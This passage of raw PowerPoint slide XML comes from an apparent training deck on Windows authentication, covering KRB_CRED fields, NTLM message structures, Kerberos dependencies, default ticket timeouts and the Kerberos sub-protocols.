                        <a:t>(Optional) At what time the ticket absolutely expires (cannot be renewed past this time).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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11"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Server Realm</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Requested server's realm (domain).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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12"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Server Name</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Requested server's name.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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13"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="567478">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Addresses</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Addresses from which the ticket will be valid. If a ticket is proxied or forwarded, it will be used on the client's behalf from another address (or perhaps several addresses). These addresses will also be included in this field.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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14"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Nonce</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The nonce from the KRB_TGS_REQ Nonce field will be copied here.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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15"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Timestamp</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Time when KRB_CRED was generated.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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16"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>USEC</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Millisecond part of timestamp.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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17"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sender Address</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Addresses, application-specific.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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18"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Recipient Address</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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Addresses, application-specific.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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19"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="正方形/長方形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="302077" y="2183581"/>
            <a:ext cx="1374390" cy="3530376"/>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四角形吹き出し 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330869" y="5887497"/>
            <a:ext cx="3050697" cy="324665"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44146"/>
              <a:gd name="adj2" fmla="val -128333"/>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400" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>encrypted with the session key</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327836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320165"/>
            <a:ext cx="7924800" cy="3939540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Singanture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = “NTLMSSP\0”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Message Type = 0x00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Negotiate Flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Name Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Workstation Name Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload that contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Name – client authentication domain name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Workstation Name – client machine name.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM – NEGOTIATE_MESSAGE</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client to Server</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397759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320165"/>
            <a:ext cx="7924800" cy="4832092"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Singanture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = “NTLMSSP\0”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Message Type = 0x00000002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target Name Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Negotiate Flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server challenge (64-bit nonce)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reserved – always 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target Info Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload that contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target Name – domain or machine name of the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target Info</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM – CHALLENGE_MESSAGE</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server to Client</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71440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320165"/>
            <a:ext cx="7924800" cy="4832092"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Singanture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = “NTLMSSP\0”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Message Type = 0x00000003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LM Challenge Response Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NT Challenge Response Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Name Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Name Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Workstation Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypted Random Session Key Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Negotiate Flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MIC – message integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM – AUTHENTICATE_MESSAGE</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client to Server</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275196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320165"/>
            <a:ext cx="7924800" cy="4524315"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload that contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LM Challenge Response – 24 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NT Challenge Response – 24 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Name – The name of the domain or machine to which the user account belongs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Name – The user name to be authenticated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Workstation – The name of the client workstation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypted Random Session Key – an encrypted random session key generated by the client for purpose of encryption and signature of application protocol messages.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM – AUTHENTICATE_MESSAGE (continued)</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client to Server</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69483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261335"/>
            <a:ext cx="7924800" cy="3493264"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS version (Windows 2000 and above)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TCP/IP (port 88 UDP/TCP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time Synchronization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SPN – Service Principal Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dependencies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424334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320165"/>
            <a:ext cx="7924800" cy="1661993"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Can be modified per domain at the Default Domain GPO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Lifetime of a Service Ticket = 600 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Lifetime of a User Ticket = 10 hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Lifetime for a User Ticket Renewal – 7 Days</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Tolerance for Computer Clock Synchronisation = 5 Minutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default Timeouts</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333860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320165"/>
            <a:ext cx="7924800" cy="1631216"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The script in the notes replaces the following attributes with readable data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Ticket Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Error Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Encryption Type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resolving Kerberos Codes in Events</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Troubleshooting / Security Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188052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Sub protocols</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3077766"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos is composed of three sub protocols (KB217098)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication Service (AS) Exchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>proceeded by AS in KDC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ticket-Granting Service (TGS) Exchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>proceeded by TGS in KDC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-Server (CS) Exchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>proceeded between Client and Server (not KDC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
